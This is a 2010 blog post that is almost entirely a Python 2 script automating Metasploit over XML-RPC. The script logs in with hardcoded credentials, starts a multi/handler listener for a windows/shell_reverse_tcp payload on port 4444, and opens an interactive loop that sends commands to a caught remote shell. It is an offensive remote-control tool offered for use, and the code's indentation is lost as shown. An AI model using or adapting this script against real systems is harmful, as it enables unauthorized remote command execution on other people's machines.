Wednesday, June 16, 2010

python metasploit xmlrpc interface 1.0


#!/usr/bin/python

import xmlrpclib
class MSFTransport(xmlrpclib.Transport):
"""Handles an transaction to the MetasploitXML-RPC server."""

# client identifier (may be overridden)
def __init__(self, use_datetime=0):
self._use_datetime = use_datetime
def request(self, host, handler, request_body, verbose=0):
# issue XML-RPC request
c = self.make_connection(host)
if verbose:
h.set_debuglevel(1)
self.send_content(c, request_body)
self.verbose = verbose
return self._parse_response(None, c)

def make_connection(self, host):
import socket
addr = host.split(":")
inetaddr = (addr[0],int(addr[1]))
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(inetaddr)
return c
def send_content(self, connection, request_body):
if request_body:
connection.send(request_body + "\0")
def _parse_response(self, file, sock):
# read response from input file/socket, and parse it
p, u = self.getparser()
while 1:
if sock:
response = sock.recv(1024)
else:
response = file.read(1024)
if not response:
break
if response.endswith("\0") :
response = response.rstrip("\0\n")
p.feed(response.encode("utf-8"))
break;
else:
p.feed(response.encode("utf-8"))

if file:
file.close()
p.close()

return u.close()
################################
from time import sleep
import base64
import xmlrpclib
#import MSFTransport
msftransport = MSFTransport()
proxy = xmlrpclib.ServerProxy("http://127.0.0.1:55553", transport=msftransport)

ret = proxy.auth.login("msf","test")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"

opts = {
"RHOST" : "192.168.1.1",
"LHOST" : "127.0.0.1",
"LPORT" : 4444,
"PAYLOAD": "windows/shell_reverse_tcp"}
print "Running exploit now"
ret = proxy.module.execute(token,"exploit","multi/handler",opts)
if(ret['result'] == 'success'):
print "Exploit sucessful...waiting on session"
sleep(25)
session_list = proxy.session.list(token)
x = session_list.keys()

def s_io(s):
while 1:
w = raw_input("shell> ")
if w == "exit":
break
write = w + "\n"
n = proxy.session.shell_write(token,s,base64.b64encode(write))
read = proxy.session.shell_read(token,s)
print base64.b64decode(read['data'])

if session_list != {} and session_list[x[0]]['type'] == 'shell':
s = int(x[0])
s_io(s)

No comments: